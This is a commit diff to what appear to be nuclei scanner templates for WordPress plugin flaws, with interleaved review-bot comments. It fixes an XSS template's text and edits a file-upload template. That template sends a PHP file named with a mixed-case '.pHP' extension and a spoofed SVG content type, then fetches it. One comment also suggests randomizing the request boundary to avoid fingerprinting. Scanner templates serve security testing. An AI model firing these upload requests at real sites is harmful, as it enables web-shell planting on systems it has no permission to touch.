dashboard gremlins

patch-1
sullo 2023-03-27 09:37:36 -04:00
parent c85f239339
commit 2d86242a2d
3 changed files with 6 additions and 1 deletions


@ -5,7 +5,7 @@ info:
author: r3Y3r53 author: r3Y3r53
severity: medium severity: medium
description: | description: |
WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file âincludes/nsp_search.phpâ, several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.
reference: reference:
- https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054
- https://g0blin.co.uk/g0blin-00057/ - https://g0blin.co.uk/g0blin-00057/
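Review bot: the old description's `âincludes/nsp_search.phpâ` is mojibake (UTF-8 curly quotes read back as Latin-1), so replacing them with plain ASCII `"includes/nsp_search.php"` is the right fix and nothing else in the block changes. Before merging, grep the rest of this template and the other templates touched by the same dashboard export for leftover `â` sequences, and make sure the file is saved as UTF-8 so the next round-trip does not reintroduce them; the `description: |` literal block keeps the quotes verbatim, so no YAML escaping is needed.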


@ -55,6 +55,7 @@ requests:
GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1 GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
req-condition: true req-condition: true
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and
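Review bot: `cookie-reuse: true` is the correct addition if the earlier requests in this block obtain a session that the upload step depends on, but note it applies to every request in the block, so the final `GET /wp-content/uploads/backup-guard/{{randstr}}.php` is also sent with those cookies; that is harmless for a static fetch from `wp-content/uploads`, but the matcher should not rely on anything session-specific in that response. The key sits at the same indent as `req-condition: true` and `matchers-condition: and`, which is where nuclei expects block-level options.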


@ -49,10 +49,12 @@ requests:
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name" Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="" Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP" Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml Content-Type: image/svg+xml
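Review bot: the bypass this body relies on is visible but undocumented: the file part is named `{{randstr}}.pHP` with a mixed-case extension and a declared `Content-Type: image/svg+xml`, i.e. the template assumes the plugin's upload filter is either case-sensitive on the extension or trusts the client-supplied MIME type. State that assumption in the template's description so a future maintainer does not "fix" the casing. The static boundary `----WebKitFormBoundaryaeBrxrKJzAF0Tgfy` is also a fixed signature; a randomized boundary (for example derived from `{{randstr}}`) would be less trivially fingerprinted. The empty `dlg-upload-file[]` part with `filename=""` mirrors what the browser form submits and can stay.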
@ -65,12 +67,14 @@ requests:
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes" Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload" Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy-- ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- | - |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1 GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
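Review bot: the verification request fetches `/wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}}`, which bakes in two assumptions that should be stated or made robust: that the plugin lowercases the stored filename (the upload part used `.pHP`, the fetch uses `.php`), and that the upload lands in the per-user directory `1`. If the plugin preserves the original case, or the authenticated user has a different ID, this GET returns 404 and the template reports a false negative even though the upload succeeded. Consider fetching both casings, or matching on the upload response as well, and add a comment explaining why `to_lower` is applied.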